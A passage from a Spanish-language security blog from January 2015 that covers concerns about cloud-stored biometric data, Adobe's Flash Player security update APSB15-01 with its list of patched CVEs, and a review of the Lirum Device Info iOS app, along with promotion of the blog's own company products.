Si miramos de manera objetiva el sistema propuesto por Apple, es un sistema de alto riesgo, ya que se almacenan datos muy sensibles, como son los biométricos en la nube. La proposición de almacenar algo tan personal como una huella digital en la nube sigue siendo algo confuso y desconcertante. No sería la primera vez que iCloud sufre algún hack, tras el escándalo de las famosas, el bloqueo de cuentas o algunos otros hacks. En Eleven Paths disponemos de Smart ID permitiendo fortificar el proceso de autenticación en la empresa utilizando para ello smartcards, dispositivos RFID/NFC o reconocimiento de huella biométrico o frima manuscrita. SealSign como plataforma empresarial permite realizar firma de documentos electrónicos compatible con certificados digitales, sistemas biométricos o sistemas OTP, además de archivar documentos firmados a largo plazo.

jueves, 15 de enero de 2015

Actualizaciones de Adobe Flash Player para OS X

Adobe ha publicado actualizaciones de seguridad para Flash Player en sus versiones para los sistemas operativos OS X y Microsoft Windows. La versión liberada se corresponde con la 16.0.0.257 y para el sistema operativo GNU/Linux es la versión 11.2.202.429. Estas actualizaciones presentan 9 parches que solventan vulnerabilidades que podrían, potencialmente, permitir a un atacante tomar el control del equipo remoto, es decir, ejecutar código arbitrario, según se informa en el boletín de seguridad de Adobe APSB15-01.

Las versiones de Adobe Flash Player afectadas van desde la 16.0.0.235 y anteriores, las veriones 13.0.0.259, versiones 13.x y anteriores, y la 11.2.202.425 y anteriores. También afectaba a versiones Adobe AIR SDK 15.0.0.356 y versiones anteriores. A continuación listamos las vulnerabilidades parcheadas:
  • CVE-2015-0301. Presenta un problema en la validación de archivos, provocando la ejecución de código arbitrario.
  • CVE-2015-0302. Esta vulnerabilidad permite capturar las pulsaciones en el sistema afectado.
  • CVE-2015-0303 y CVE-2015-0306. Estas vulnerabilidades permiten la ejecución de código arbitrario.
  • CVE-2015-0304 y CVE-2015-0309. Heap Overflow que permite la ejecución de código arbitrario.
  • CVE-2015-0305 y CVE-2015-0307. Crash de memoria provocado por ejecución en posiciones de memoria no debidas.
  • CVE-2015-0308. Después de liberar memoria existe un fallo que puede provocar la ejecución de código arbitrario.
Se puede descargar Adobe Flash Player para OS X y Microsoft Windows desde el sitio web de Adobe, al igual que la versión de GNU/Linux. Si el usuario dispone de Google Chrome se iniciará la instalación automáticamente a la última versión desde el propio navegador. El navegador Safari deshabilita el módulo en los videos para que tengamos que actualizar a la nueva versión.

miércoles, 14 de enero de 2015

Lirum Device Info: Monitoriza el rendimiento y el estado de salud de tus dispositivos iOS {iPhone, iPad & iPod Touch}

En muchas ocasiones necesitamos saber porque una aplicación no se está ejecutando como debiera, en qué estado se encuentra y el consumo de recursos de los dispositivos iOS sobre los que la estamos corriendo. Para ayudarte con esto sirve la aplicación de la que hablamos hoy, que se llama Lirum Device Info y permite recopilar gran cantidad de información del dispositivo en tiempo real a través del sistema operativo y sus sensores. De esta forma, el usuario puede monitorizar y obtener feedback desde los sensores que los dispositivos de Apple disponen, como el acelerómetro, el GPS, el giroscopio, etcétera.

La aplicación tienen cientos de funcionalidades, como por ejemplo conocer el estado de la memoria, las conexiones del dispositivo, el estado de la batería y cuanto tiempo está consumiendo los componentes, etcétera. Existe diversidad de información que la aplicación proporciona al usuario. Dentro de cada categoría se proporciona más información y puede servir a un comprador de un terminal de segunda mano para conocer en qué estado se encuentra el dispositivo. Las categorías que proporciona la aplicación son: General, Display, Dimensions, CPU, System y Connectivity.


Figura 1: Lirum Device Info para iOS


En el vídeo de arriba se puede ver una demostración de la aplicación y las interesantes funcionalidades que aportan a nuestro dispositivo iOS. Si nos gusta tener bajo control todo el rendimiento de nuestro dispositivo esta aplicación nos ayudará a entenderlo mejor. Los requisitos de compatibilidad son los siguientes: iOS 7.1 o posterior y es compatible con dispositivos iPhone, iPad e iPod Touch. La aplicación se encuentra optimizada para iPhone 5, iPhone 6 e iPhone 6 Plus. El precio en la App Store es de 2,99€

Entrada destacada

Proteger tu cuenta de Google y de Gmail con Latch Cloud TOTP #Latch #Gmail #Google

La semana pasada se liberó la nueva versión de Latch y nuestro compañero Chema Alonso hizo un repaso de todo ello en su artículo Latch...

Otras historias relacionadas

Entradas populares